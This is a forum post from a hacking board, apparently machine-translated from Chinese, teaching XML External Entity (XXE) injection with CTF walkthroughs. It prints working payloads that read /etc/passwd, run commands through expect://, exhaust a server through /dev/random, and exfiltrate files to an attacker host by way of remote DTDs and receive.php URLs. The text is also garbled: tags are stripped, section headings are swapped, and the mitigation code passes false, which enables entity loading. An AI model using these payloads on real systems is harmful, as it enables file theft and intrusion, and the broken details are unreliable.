Jump to content

Title: XXE vulnerability related

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

XXE 漏洞相关

1 定义与原理

1.1 XXE 定义

XXE Vulnerability Full name XML External Entity Injection, XML external entity injection vulnerability, XXE vulnerability occurs when the application parses XML input, and does not prohibit the loading of external entities, resulting in malicious external files being loaded, causing file reading, intranet port scanning, attacking intranet websites to initiate dos attacks and other hazards.

1.2 XML 基础

1.2.1 XML 定义

Document markup language, XML document structure includes XML declaration, DTD document type definition (optional), document elements

1

2

3

4

5

6

7

8

9

10

!-- Declaration Information --

?xml version='1.0' encoding='UTF-8' ?

scores

student id='s1'

namehacker/name

courseC++/course

score95/score

/student

/scores

1.2.2 DTD 定义

DTD - Document Type Definition Document type definition, using DTD to define which modules are in XML documents and what contents are in modules (analogically strongly typed languages).

在 XML 文件中定义内部 DTD:1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

!-- Declaration Information --

?xml version='1.0' encoding='UTF-8' ?

!-- Define internal DTD --

!DOCTYPE scores [

!ELEMENT scores (student+)

!ELEMENT student (name, course, score)

!ATTLIST student id CDATA #REQUIRED

!ELEMENT course (#PCDATA)

!ELEMENT name (#PCDATA)

!ELEMENT score (#PCDATA)

]

scores

student id='s1'

namehacker/name

courseC++/course

score90/score

/student

/scores

PCDATA means parsed character data

引用外部实体:1

2

3

4

5

6

7

8

9

10

11

12

13

!-- Declaration Information --

?xml version='1.0' encoding='UTF-8' ?

!-- Quotation of external DTD --

!DOCTYPE scores SYSTEM 'scores.dtd'

scores

student id='s1'

namehacker/name

courseC++/course

score90/score

/student

/scores

scores.dtd file content:

1

2

3

4

5

6

7

8

!-- Declaration Information --

?xml version='1.0' encoding='UTF-8' ?

!ELEMENT scores (student+)

!ELEMENT student (name, course, score)

!ATTLIST student id CDATA #REQUIRED

!ELEMENT course (#PCDATA)

!ELEMENT name (#PCDATA)

!ELEMENT score (#PCDATA)

2 XML 实体注入

In DTD, entities (analogous to constants in programming languages) can be defined. The defined entities can be referenced in xml. After parsing by the XML parser, the entities will be replaced with the defined text content.

The format of the reference entity is: entity name;

When an external entity is referenced, there may be some problems. The following code is an example of referencing an external entity:

1

2

3

4

5

?xml version='1.0'?

!DOCTYPE demo[

!ENTITY content SYSTEM 'file:///etc/password'

]

democontent;/demo

Therefore, the XML vulnerability is mainly due to the characteristics of external entities that can parse external files.

Parameter Entity:

Parameter entities are only used in DTD and internal subsets of documents. In the specification definition of XML, parameter entities can only be referenced in DTD. The declaration and reference of parameter entities are all signed by a percent. And the reference to the parameter entity is understood and parsed in DTD, and the replacement text will become part of the DTD. Entities of this type are in the "%" character (or % encoded in hexadecimal).

Parameter entities can only be used in DTD.

1

2

3

4

5

6

7

8

9

?xml version='1.0'?

!DOCTYPE root[

!ELEMENT root (message)

!ENTITY % param1 '!ENTITY internal 'http://xxx.com''

%param1;

]

root

messageinternal;/message

/root

Parameter entities are often used in XXEs without echo.

3 XXE 危害

3.1 读取任意文件

3.1.1 有回现

Take the shooting range on vulhub as an example:

20190115153320.png-water_print

payload:

1

2

3

4

5

6

7

?xml version='1.0' encoding='utf-8'?

!DOCTYPE root [

!ELEMENT name ANY

!ENTITY data SYSTEM 'file:///etc/passwd']

root

namedata;/name

/root

The principle of blind xxe is very simple, which is to establish an out-of-band channel to extract data, use the URL in the external entity to issue access, and use the attacker's public network host to receive data, thereby achieving data reading.

The attacker sent a payload to the server with XXE vulnerability. The function of this payload is to find a file native to the server, and then request a URL request from the attacker's server to obtain the malicious DTD content. When the server with the vulnerability reads the content of the DTD to pass the content of the local file he found as a parameter to the php file of the attacker's server. The php file saves the obtained parameter locally, thus obtaining the echoed content.

payload:

1

2

3

4

5

6

7

8

9

10

?xml version='1.0' encoding='utf-8'?

!DOCTYPE foo [

!ELEMENT foo ANY

!ENTITY % evil SYSTEM 'file:///etc/passwd'

!-- Or read in pseudo-protocol encoding php://filter/read=convert.base64-encode/resource=conf.php --

!ENTITY % xxe SYSTEM 'http://IP/dtd.xml'

%xxe;

%all;

]

footend;/foo

dtd.xml

1

!ENTITY % all '!ENTITY send SYSTEM 'http://IP/receive.php?p=%evil;''

In the internal DTD, the parameter entity reference can only be of the same level as the element and cannot appear directly inside the element declaration. Otherwise, the parser will report an error: PEReferences forbidden in internal subset.

3.1.2 无回显

Need to install the expected extension

1

2

3

4

5

6

7

?xml version='1.0' encoding='utf-8'?

!DOCTYPE xxe [

!ELEMENT name ANY

!ENTITY xxe SYSTEM 'expect://id']

xxe

namexxe;/name

/xxe

3.2 执行命令

1

2

3

4

5

6

7

?xml version='1.0' encoding='utf-8'?

!DOCTYPE xxe [

!ELEMENT name ANY

!ENTITY xxe SYSTEM 'file:///dev/random']

xxe

namexxe;/name

/xxe

3.3 拒绝服务攻击

4 CTF 题目

http://web.jarvisoj.com:9882

Title description: Please obtain the content under /home/ctf/flag.txt

Visit the web, click Go, and catch the request package in burpsuite

1

2

3

4

5

6

7

8

9

10

11

12

13

POST /api/v1.0/try HTTP/1.1

Host: web.jarvisoj.com:9882

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json

Content-Length: 36

Origin: http://web.jarvisoj.com:9882

Connection: close

Referer: http://web.jarvisoj.com:9882/

{'search':'type sth!','value':'own'}

Change Content-Type to application/xml and submit poc:

20190115160754.png-water_print

4.1 DEMO 1

Source code:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

?php

function __autoload($cls) {

include $cls;

}

class Black {

public function __construct($string, $default, $keyword, $store) {

if ($string) ini_set('highlight.string', '#0d0d0d');

if ($default) ini_set('highlight.default', '#0d0d0d');

if ($keyword) ini_set('highlight.keyword', '#0d0d0d');

if ($store) {

setcookie('theme', 'Black-'.$string.'-'.$default.'-'.$keyword, 0, '/');

}

}

}

class Green {

public function __construct($string, $default, $keyword, $store) {

if ($string) ini_set('highlight.string', '#00fb00');

if ($default) ini_set('highlight.default', '#00fb00');

if ($keyword) ini_set('highlight.keyword', '#00fb00');

if ($store) {

setcookie('theme', 'Green-'.$string.'-'.$default.'-'.$keyword, 0, '/');

}

}

}

if ($_=@$_GET['theme']) {

if (in_array($_, ['Black', 'Green'])) {

if (@class_exists($_)) {

($string=@$_GET['string']) || $string=false;

($default=@$_GET['default']) || $default=false;

($keyword=@$_GET['keyword']) || $keyword=false;

new $_($string, $default, $keyword, @$_GET['store']);

}

}

} else if ($_=@$_COOKIE['theme']) {

$args=exploit('-', $_);

if (class_exists($args[0])) {

new $args[0]($args[1], $args[2], $args[3], '');

}

} else if ($_=@$_GET['info']) {

phpinfo();

}

highlight_file(__FILE__);

It can be seen that the place where the topic class is loaded according to the cookie is not judged whether the cookie has been tampered with, resulting in us being able to instantiate any class new $args[0]($args[1], $args[2], $args[3], '');

Look for built-in php native class, and the instantiation parameters of this class must correspond to $args[0]($args[1], $args[2], $args[3], ''), and the class SimpleXMLElement meets the above requirements.

Therefore, the /flag.php file can be read through Blind XXE

payload:

Cookie:theme=SimpleXMLElement-http://ip/xxe.xml-2-true

Remote xxe.xml

1

2

3

4

5

6

7

8

?xml version='1.0' encoding='utf-8'?

!DOCTYPE foo [

!ENTITY % file SYSTEM 'php://filter/read=convert.base64-encode/resource=file:///flag'

!ENTITY % remote SYSTEM 'http://IP/xxe.dtd'

%remote;

%all;

]

footend;/foo

xxe.dtd

1

!ENTITY % all '!ENTITY send SYSTEM 'http://IP/receive.php?file=%file;''

4.2 DEMO 2

Methods for disabling external entities provided by the development language

PHP libxml version is lower than 2.9.1 and is enabled by default

1

2

3

?php

libxml_disable_entity_loader (false);

?

Filters user-submitted XML data, such as keywords SYSTEM, PUBLIC, etc.

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.